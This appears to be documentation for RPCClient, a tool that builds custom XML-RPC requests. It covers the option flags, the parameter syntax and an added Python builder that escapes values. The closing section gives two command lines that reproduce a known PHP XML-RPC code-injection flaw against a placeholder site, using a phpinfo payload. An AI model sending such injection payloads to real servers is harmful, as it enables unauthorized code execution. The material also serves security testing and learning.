This tool allows you to communicate with an XML-RPC service and build packages as custom as you want.
The tool has several options:
- -t: Target. This parameter indicates the URL where the service is running, e.g. http://www.vulnerablesite.com/xmlrpc.php
- -M: Method. The remote method or function you want to call. In the example of the sum of numbers it could be SumBigNumbers.
- -P: Parameters. Explained below.
- -h: Show the help dialog.
- -v: Set verbose mode on. With this option activated, the program shows the package before sending it.
- -u: User name for the web server.
- -p: Password.
There are several types of parameters, according to the specification, which can be found at http://en.wikipedia.org/wiki/XML-RPC.
Depending on the type, parameters are written in one form or another. The general shape is type@value:
All types except array and struct:
-P integer@<value>
The array type may hold several values. Each value is a type#value pair: the '#' symbol separates the type from the value inside a pair, and the '%' symbol separates one pair from the next. Example:
-P array@type1#value1%type2#value2%...%typeN#valueN
Similar to array, but each tuple has 3 fields: member name, type and value. The syntax is the same as for array, with '#' separating the three fields of a tuple and '%' separating tuples. Example:
-P struct@name1#type1#value1%...%nameN#typeN#valueN
If our type is not one of the above, we can make our own. Each tuple is an element name and its value, again separated by '#', with '%' between tuples. The custom-type keyword that goes before the '@' is lost in this copy of the text and is written here as <keyword>. Syntax: <keyword>@OurType1#OurVal1%...%OurTypeN#OurValN. Example:
-P <keyword>@BigInt#99999999999%NegativeInt#-10000
This command produces the following XML:
<BigInt> 99999999999 </BigInt> <NegativeInt> -10000 </NegativeInt>
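The following is an added example, not code from the RPCClient tool itself. It parses the -P syntax described above (scalar, array, struct and custom tuples) and emits the corresponding XML-RPC `<param>` element. The keyword for the custom type is assumed to be `custom`, since the original text does not preserve it. The example also shows the two checks a builder like this needs and that the description above does not mention: every value is XML-escaped so that a parameter cannot change the structure of the request, and custom element names must be valid XML names.

```python
import re
from xml.sax.saxutils import escape

# Custom-type keyword is an assumption; the page does not preserve the real one.
CUSTOM_KEYWORD = "custom"

# The tool calls the integer type "integer"; XML-RPC itself uses <int> (or <i4>).
TYPE_ALIASES = {"integer": "int"}

# Element names for custom types must be well-formed XML names, otherwise the
# generated request is no longer valid XML (or, worse, is interpreted as markup).
XML_NAME = re.compile(r"^[A-Za-z_][A-Za-z0-9_.\-]*$")


def _split_pairs(payload, fields):
    """Split 'a#b%c#d' into tuples of `fields` elements each."""
    tuples = []
    for chunk in payload.split("%"):
        parts = chunk.split("#", fields - 1)
        if len(parts) != fields:
            raise ValueError("expected %d '#'-separated fields in %r" % (fields, chunk))
        tuples.append(tuple(parts))
    return tuples


def parse_param(spec):
    """Parse one -P value (type@payload) into (kind, data)."""
    type_name, sep, payload = spec.partition("@")
    if not sep:
        raise ValueError("parameter must be type@value: %r" % spec)
    if type_name == "array":
        return ("array", _split_pairs(payload, 2))           # [(type, value), ...]
    if type_name == "struct":
        return ("struct", _split_pairs(payload, 3))          # [(name, type, value), ...]
    if type_name == CUSTOM_KEYWORD:
        elems = _split_pairs(payload, 2)                     # [(element, value), ...]
        for tag, _ in elems:
            if not XML_NAME.match(tag):
                raise ValueError("invalid XML element name: %r" % tag)
        return ("custom", elems)
    return ("scalar", (type_name, payload))


def _scalar(type_name, value):
    tag = TYPE_ALIASES.get(type_name, type_name)
    if not XML_NAME.match(tag):
        raise ValueError("invalid XML-RPC type name: %r" % tag)
    # escape() turns < > & into entities, so the value stays a value.
    return "<value><%s>%s</%s></value>" % (tag, escape(value), tag)


def value_xml(kind, data):
    """Render a parsed parameter as an XML-RPC <value> element."""
    if kind == "scalar":
        return _scalar(*data)
    if kind == "array":
        inner = "".join(_scalar(t, v) for t, v in data)
        return "<value><array><data>%s</data></array></value>" % inner
    if kind == "struct":
        inner = "".join(
            "<member><name>%s</name>%s</member>" % (escape(n), _scalar(t, v))
            for n, t, v in data
        )
        return "<value><struct>%s</struct></value>" % inner
    if kind == "custom":
        inner = "".join("<%s>%s</%s>" % (tag, escape(v), tag) for tag, v in data)
        return "<value>%s</value>" % inner
    raise ValueError("unknown kind %r" % kind)


def build_method_call(method, specs):
    """Build the full <methodCall> body from a method name and a list of -P specs."""
    params = "".join("<param>%s</param>" % value_xml(*parse_param(s)) for s in specs)
    return ('<?xml version="1.0"?><methodCall><methodName>%s</methodName>'
            "<params>%s</params></methodCall>") % (escape(method), params)


if __name__ == "__main__":
    # Constructed sample input mirroring the page's custom-type example.
    print(build_method_call("SumBigNumbers",
                            ["custom@BigInt#99999999999%NegativeInt#-10000"]))
```

Because every value goes through `escape()`, a parameter value such as `a<b` is sent as `a&lt;b`; a client that concatenates raw strings into the XML instead would let the value rewrite the request, which is the class of problem the parsing side of XML-RPC services has historically been bitten by.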
If we look a bit on the internet we can find a vulnerability associated with XML-RPC: http://www.securityfocus.com/bid/14088/exploit
If we want to reproduce that request we can run the following command (on Windows directly, or under Mono on other platforms; <keyword> and <element> stand for the custom-type keyword and element name, which are lost in this copy of the text):
RPCClient.exe -t http://www.sitiovulnerable.com/xmlrpc.php -v -M test.method -P "<keyword>@<element>#','')); phpinfo(); exit;/*"
mono RPCClient.exe -t http://www.sitiovulnerable.com/xmlrpc.php -v -M test.method -P "<keyword>@<element>#','')); phpinfo(); exit;/*"
It is very important to stress the quotes at the beginning and end of the parameter: without them the shell interprets the metacharacters in the command line itself, and the string does not reach RPCClient whole as a single parameter.